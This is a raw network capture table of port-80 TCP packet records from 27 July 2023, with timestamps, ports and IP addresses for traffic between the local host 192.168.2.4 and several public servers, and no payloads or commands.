Jul 27, 2023 20:19:26.942270041 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.942291975 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.942297935 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.942313910 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.942333937 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.942336082 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:26.942375898 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:26.979738951 CEST	49787	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:26.980387926 CEST	49788	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:27.011547089 CEST	80	49787	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:27.011641026 CEST	49787	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:27.012042999 CEST	80	49788	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:27.012130022 CEST	49788	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:27.014830112 CEST	49788	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:27.046626091 CEST	80	49788	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:27.048885107 CEST	80	49788	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:27.048984051 CEST	49788	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:27.197108984 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.197187901 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.197235107 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.197285891 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.197320938 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.197367907 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.197376013 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.197416067 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.197464943 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.197508097 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.197520018 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.197551966 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.197594881 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.197614908 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.197638035 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.197638988 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.197684050 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.197886944 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.197932959 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.197978020 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.197999954 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.198021889 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.198046923 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.198091984 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.198096037 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.198348045 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.198390961 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.198400021 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.198436022 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.198483944 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.198539019 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.198880911 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.198928118 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.198970079 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.198985100 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.199013948 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.199027061 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.199059010 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.199112892 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.199433088 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.199481964 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.199526072 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.199532032 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.199570894 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.199625015 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.199971914 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.200017929 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.200062990 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.200076103 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.200108051 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.200154066 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.200203896 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.200371981 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.200423002 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.200469971 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.200478077 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.200514078 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.200558901 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.200568914 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.200609922 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.200934887 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.200980902 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.201025009 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.201031923 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.201072931 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.201122046 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.201471090 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.201517105 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.201560974 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.201606035 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.201612949 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.201649904 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.201699018 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.201924086 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.201968908 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.202014923 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.371414900 CEST	49788	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:27.372131109 CEST	49789	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:27.403464079 CEST	80	49788	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:27.403573990 CEST	80	49789	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:27.403727055 CEST	49788	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:27.405502081 CEST	49789	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:27.414807081 CEST	49790	80	192.168.2.4	185.12.79.25
Jul 27, 2023 20:19:27.415575027 CEST	49789	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:27.447011948 CEST	80	49789	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:27.448518991 CEST	80	49789	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:27.448688984 CEST	49789	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:27.455024958 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.455071926 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.455099106 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.455126047 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.455151081 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.455169916 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.455178022 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.455203056 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.455204964 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.455229998 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.455231905 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.455255985 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.455282927 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.455291986 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.455308914 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.455316067 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.455337048 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.455364943 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.455368042 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.455389977 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.455430031 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.455460072 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.455466032 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.455487013 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.455496073 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.455513954 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.455552101 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.455887079 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.455923080 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.455950975 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.455977917 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.455981016 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.456018925 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.456032991 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.456392050 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.456427097 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.456454992 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.456454992 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.456482887 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.456506014 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.456509113 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.456546068 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.456866026 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.456897020 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.456938982 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.456964016 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.456964970 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.456995010 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.457386017 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.457421064 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.457449913 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.457475901 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.457478046 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.457503080 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.457520962 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.457868099 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.457926035 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.457957029 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.457971096 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.457983971 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.457988977 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.458012104 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.458043098 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.458391905 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.458424091 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.458450079 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.458466053 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.458473921 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.458913088 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.458972931 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.458998919 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.459022999 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.459024906 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.459043980 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.459062099 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.459727049 CEST	80	49790	185.12.79.25	192.168.2.4
Jul 27, 2023 20:19:27.461529970 CEST	49790	80	192.168.2.4	185.12.79.25
Jul 27, 2023 20:19:27.461777925 CEST	49790	80	192.168.2.4	185.12.79.25
Jul 27, 2023 20:19:27.461832047 CEST	49790	80	192.168.2.4	185.12.79.25
Jul 27, 2023 20:19:27.506535053 CEST	80	49790	185.12.79.25	192.168.2.4
Jul 27, 2023 20:19:27.605423927 CEST	49789	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:27.606054068 CEST	49791	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:27.636846066 CEST	80	49789	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:27.637242079 CEST	80	49791	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:27.637324095 CEST	49789	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:27.637363911 CEST	49791	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:27.637804031 CEST	49791	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:27.666999102 CEST	80	49790	185.12.79.25	192.168.2.4
Jul 27, 2023 20:19:27.667062044 CEST	80	49790	185.12.79.25	192.168.2.4
Jul 27, 2023 20:19:27.669167042 CEST	80	49791	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:27.669253111 CEST	49790	80	192.168.2.4	185.12.79.25
Jul 27, 2023 20:19:27.669715881 CEST	49790	80	192.168.2.4	185.12.79.25
Jul 27, 2023 20:19:27.670881987 CEST	80	49791	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:27.670964003 CEST	49791	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:27.712747097 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.712779999 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.712798119 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.712816954 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.712836981 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.712856054 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.712861061 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.712873936 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.712892056 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.712920904 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.712922096 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.712924957 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.712943077 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.712960005 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.712976933 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.712977886 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.713021040 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.713021040 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.713130951 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.713150024 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.713169098 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.713187933 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.713219881 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.713249922 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.713637114 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.713665009 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.713690996 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.713712931 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.713763952 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.713764906 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.714103937 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.714123964 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.714143038 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.714179993 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.714183092 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.714198112 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.714230061 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.714246035 CEST	80	49790	185.12.79.25	192.168.2.4
Jul 27, 2023 20:19:27.714612007 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.714633942 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.714653015 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.714669943 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.714694977 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.714729071 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.715121984 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.715145111 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.715172052 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.715190887 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.715209961 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.715214014 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.715255976 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.715255976 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.715635061 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.715656042 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.715676069 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.715694904 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.715713978 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.715717077 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.715749025 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.716115952 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.716139078 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.716165066 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.716180086 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.716195107 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.716223955 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.716618061 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.716640949 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.716660023 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.716677904 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.716702938 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.716707945 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.716737032 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.716757059 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.717109919 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.717132092 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.719561100 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.762327909 CEST	49766	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:27.792733908 CEST	49791	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:27.793416977 CEST	49792	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:27.824176073 CEST	80	49791	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:27.824285984 CEST	49791	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:27.825061083 CEST	80	49792	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:27.825136900 CEST	49792	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:27.825721979 CEST	49792	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:27.831460953 CEST	49793	80	192.168.2.4	151.251.31.98
Jul 27, 2023 20:19:27.857666969 CEST	80	49792	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:27.859040022 CEST	80	49792	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:27.859613895 CEST	49792	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:27.865747929 CEST	49794	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:27.885401964 CEST	80	49793	151.251.31.98	192.168.2.4
Jul 27, 2023 20:19:27.888638020 CEST	49793	80	192.168.2.4	151.251.31.98
Jul 27, 2023 20:19:27.889055967 CEST	49793	80	192.168.2.4	151.251.31.98
Jul 27, 2023 20:19:27.889163971 CEST	49793	80	192.168.2.4	151.251.31.98
Jul 27, 2023 20:19:27.942778111 CEST	80	49793	151.251.31.98	192.168.2.4
Jul 27, 2023 20:19:27.969187975 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.969283104 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.969374895 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.969429970 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.969491959 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.969540119 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.969579935 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.969604015 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.969623089 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.969662905 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.969964027 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.970014095 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.970055103 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.970105886 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.970112085 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.970130920 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.970140934 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.970187902 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.970469952 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.970514059 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.970541000 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.970566988 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.970580101 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.970628977 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.970918894 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.970947027 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.970972061 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.970998049 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.971018076 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.971021891 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.971045971 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.971465111 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.971497059 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.971523046 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.971544981 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.971550941 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.971576929 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.971970081 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.971997976 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.972024918 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.972049952 CEST	80	49778	183.100.39.157	192.168.2.4
